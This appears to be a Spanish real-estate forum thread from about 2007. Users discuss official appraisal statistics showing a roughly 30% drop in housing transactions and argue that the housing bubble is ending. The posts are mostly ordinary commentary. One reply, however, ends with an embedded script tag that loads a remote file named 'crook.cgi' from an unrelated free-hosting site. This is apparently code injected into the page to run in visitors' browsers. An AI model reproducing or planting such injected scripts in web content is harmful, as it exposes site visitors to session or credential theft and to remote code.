Caida del 30% de las operaciones

epsilon

Madmaxista
Desde
8 Ago 2006
Mensajes
261
Reputación
8
Bueno, he estado echando unas cuentas con los precios de municipios de más de 25.000 habitantes (http://www.mviv.es/es/xls/estadisticas/APLI/pmf.xls) y he notado que este trimestre es el primero en que se nota una bajada, y además brutal, en el dato interanual de operaciones.

En concreto hasta ahora, el año pasado, todos los trimestres había subido el número de operaciones. Los datos los he comparado por trimestres porque influye mucho la estacionalidad. ¿Ha bajado la demanda de vivienda un 30%? ¿Puede ser debido a la salida de los pasapiseros-especuladores o más bien a que la gente ya no llega?

En fin, creo que es uno de los datos más importantes que pueden salir de las estadísticas de este trimestre.



Adjunto el excel con el que he hecho las cuentas para que lo verifiqueis, por si he metido la pata.

Editado: Cambiada la imagen, era demasiado grande.
 
Última edición:

Mouguias

Madmaxista
Desde
15 Mar 2007
Mensajes
5.082
Reputación
13.291
A eso llamo yo aprovechar la información.
¿Chincheta?<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

Neutron_Mortgages

Madmaxista
Desde
20 Sep 2006
Mensajes
2.425
Reputación
1.259
.
Este dato es fundamental.
Por mucho que digan, con el número de pisos que hay a la venta (y los que van a ir llegando, que son cientos de miles), es cuestión de tiempo que los precios se vayan detrás.

Si es verdad lo que dijo ZP el otro día en A3 de que las elecciones serán dentro de un año ya os digo yo que esto no aguanta tanto.
Va demasiado deprisa.

Y tampoco es tan raro, si hemos sido los campeones subiendo ...
 

burbujitaboom

Madmaxista
Desde
30 Jun 2006
Mensajes
1.076
Reputación
148
la cosa esta peor aun

Si tienes en cuenta que muchas ventas que se firman a dia de hoy, son viviendas que se vendieron sobre plano hace año o año y medio, el resultado es que actualmente se vende mucho menos de lo que cabria deducir de esos numeros.

Creo que el crack es total, solo que lo iremos notando dia a dia mucho mas
 

mdemichel

Madmaxista
Desde
26 Mar 2007
Mensajes
160
Reputación
19
Yo he hecho un análisis por pueblos de la comunidad de madrid

Lo que me he fijado es que la mayoría de los pueblos del sur (donde yo vivo) han bajado el precio en vivienda usada (mayor de 2 años). El total, se ve influenciado por los pueblos "más pijillos" (Alcobendas, Pozuelo, San Sebastian de los Reyes, Majadahonda ...) y Madrid.

Pero mirad la tendencia general de desaceleración (e incluso bajada, me atrevo a decir) de precios

Por si alguien le interesa:
 
Última edición:

The Cool Spot

Madmaxista
Desde
20 Oct 2006
Mensajes
4.568
Reputación
3.569
En mi ciudad ha reventado a lo grande: 8,88% de caida del precio desde el 2º trimestre del 2006. ¿Donde ha quedado el aterricismo ese que predicaban algunos?

PD.: Y me digo a mi mismo: "vale, aceptamos barco..." que traducido quiere decir, "vale, aceptamos las estadisticas de tasadoras del mviv como indicador fiable". A falta de otros...

Edito: habia calculado mal, es "solo" un 8,16% :D
 
Última edición:

Eddy

Madmaxista
Desde
1 Oct 2006
Mensajes
4.926
Reputación
7.828
¿Qué dicen los bolsistas de una subida sin volumen?
 

Mr. Hou$ing Bubble

Madmaxista
Desde
4 Abr 2007
Mensajes
151
Reputación
23
No es por no ir, peeeero... en la hoja pone Tasaciones.
¿Equivalen a transacciones? ¿Alquien sabe de dónde salen esos números?

Un saludo
 

Marai

Madmaxista
Desde
31 Jul 2006
Mensajes
8.032
Reputación
6.796
Mr. Hou$ing Bubble dijo:
No es por no ir, peeeero... en la hoja pone Tasaciones.
¿Equivalen a transacciones? ¿Alquien sabe de dónde salen esos números?

Un saludo
Si, efectivamente son tasaciones, pero no cualquier tasación. Son las tasaciones que se ordenan para la solicitud de hipoteca y han de cumplir una serie de requisitos. Yo también me he sorprendido por este dato y he comparado los datos de transacciones (que se publican un trimestre más tarde) con los de tasaciones. El resultado es que hay una buena correlación entre los datos defnitivos de transacciones y los de tasaciones: cuando aumentan las tasaciones aumntan las transacciones y viceversa. En general, el número de tasaciones en las casi 250 poblaciones de la lista del MdV supone entre un 50-70% del número de transacciones que luego se publican y aunque esa oscilación pueda parecer muy grande es importante notar que se trata de una oscilación principalmente estacional. Por tanto, el dato de las tasaciones es un buen indicador de como van a evolucionar el número total de transacciones. Como dice la nota metodológica se trata de un dato que pretende incorporar exhaustivamente todas las tasaciones que se hacen en las compraventas.

epsilon: gracias por el dato y por lo que hemos aprendido.
Este dato marca oficialmente el principio del fin de la fiesta inmobliaria.
 
Desde
20 Mar 2007
Mensajes
2.936
Reputación
3.340
:eek:
Estos datos parecen indicar que en el tercer trimestre de 2007 viene el gran hundimiento ¿no?

Agárrense las kalandrakas (por si acaso)
 

>> 47 <<

Madmaxista
Desde
28 Ago 2006
Mensajes
24.356
Reputación
7.061
Caida del 30% de las operaciones
Por ahora, la caida de las operaciones, no conlleva un descenso significativo de los precios, y menos de los zulos más insalubres en los núcleos de gran demanda, que son excluidos de las estadísticas y las tasaciones para "uniformizar las muestras y tal".

Los terratenientes y acaparadores especulativos de suelo y techo durante siglos, no se ven presionados para alquilar ni para vender por más sobreoferta que haya, y por menos capacidad que reste entre los megaendeudables para megaendeudarse cuando los pardillos empepitables ya hace tiempo que lo hicieron.

Falta el macroempujoncito definitivo. Falta redoblar empujoncitos para evitar la formación de nuevas burbujas especulativas con un derecho constitucional. No sirve la autocomplacencia trujillera cuando el precio del metro cuadrado de venta y alquiler ha subido desproporcionadamente desde el 2004. Falta que se estimule fiscalmente el alquiler o venta, para que no sea tan barato permitirse el lujo de acaparar derechos constitucionales de todo ciudadano.

¿Cuando habría que redoblar empujoncitos?

¿Antes o despues de las elecciones de los poderes púbicos que ostentan las competencias para fomentar la acaparación especulativa o para impedirla como establece la constitucion?
 

gascas

Madmaxista
Desde
12 Ene 2007
Mensajes
90
Reputación
13
Epsilon

Me parece la mejor aportación en mucho tiempo

Way to go¡